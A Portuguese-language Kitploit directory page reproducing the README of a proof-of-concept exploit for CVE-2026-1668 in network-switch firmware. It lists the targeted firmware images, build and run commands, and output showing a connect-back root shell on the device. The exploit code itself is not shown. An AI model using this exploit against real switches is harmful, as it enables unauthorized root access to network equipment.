Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2026-1668-poc — Exploit de prova de conceito para CVE-2026-1668. | Kitploit
Ferramentas/GitHubGitHub/tangrs/cve-2026-1668-poc
Segurança de Sistemas EmbarcadosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança de Hardware e IoTAprendizado e EducaçãoAnálise de FirmwareExploração de Binários
GitHubtangrs/cve-2026-1668-poc

cve-2026-1668-poc

Exploit de prova de conceito para CVE-2026-1668.

Ver Repositório
212há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

Exploit de prova de conceito para CVE-2026-1668

Este é um exploit de prova de conceito para CVE-2026-1668. Destina-se exclusivamente a fins educacionais. Por favor, não tente explorar sistemas que você não possui ou para os quais não tem permissão explícita para explorar.

Esta prova de conceito foi desenvolvida contra uma imagem de firmware com o seguinte hash SHA256: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.

Nomes de firmwares conhecidos por corresponder a esse hash (lista não exaustiva):

  • SG2005P-PDv1_en_1.0.16_[20251031-rel72837]_up.bin
  • SG2008Pv3_en_3.20.14_[20251031-rel72837]_up.bin
  • SG2008v4_en_4.20.14_[20251031-rel72837]_up.bin
  • SG2016Pv1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2210MPv4_en_4.20.15_[20251031-rel72837]_up.bin
  • SG2210MPv5_en_5.0.12_[20251031-rel72837]_up.bin
  • SG2210Pv5_en_5.20.15_[20251031-rel72837]_up.bin
  • SG2218Pv1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2218Pv2_en_2.0.11_[20251031-rel72837]_up.bin
  • SG2218v1_en_1.20.14_[20251031-rel72837]_up.bin
  • SG2428LPv1_en_1.0.12_[20251031-rel72837]_up.bin
  • SG2428Pv5_en_5.20.17_[20251031-rel72837]_up.bin
  • SG2428Pv5_en_5.30.13_[20251031-rel72837]_up.bin
  • SG3210v3_en_3.20.14_[20251031-rel72837]_up.bin
  • SL2428Pv6_en_6.20.15_[20251031-rel72837]_up.bin
  • TL-SG2428Pv4_en_4.0.23_[20251031-rel72837]_up.bin

Versões de firmware anteriores provavelmente também são vulneráveis, mas podem exigir pequenas alterações no payload do exploit.

Uma explicação de como o payload funciona pode ser encontrada neste artigo de blog.

Compilação

Uma toolchain GCC Linux MIPS é necessária para compilar o payload. No Ubuntu 24.04, ela pode ser instalada com sudo apt install gcc-mips-linux-gnu.

$ make

Execução

Este exploit deve ser executado antes de o servidor HTTP atender à sua primeira requisição (ou seja, em um boot recém-iniciado).

$ ./run.sh

O script deve fornecer um shell de root. Caso contrário, o exploit falhou.

[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json

{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc # 
Baixar ferramenta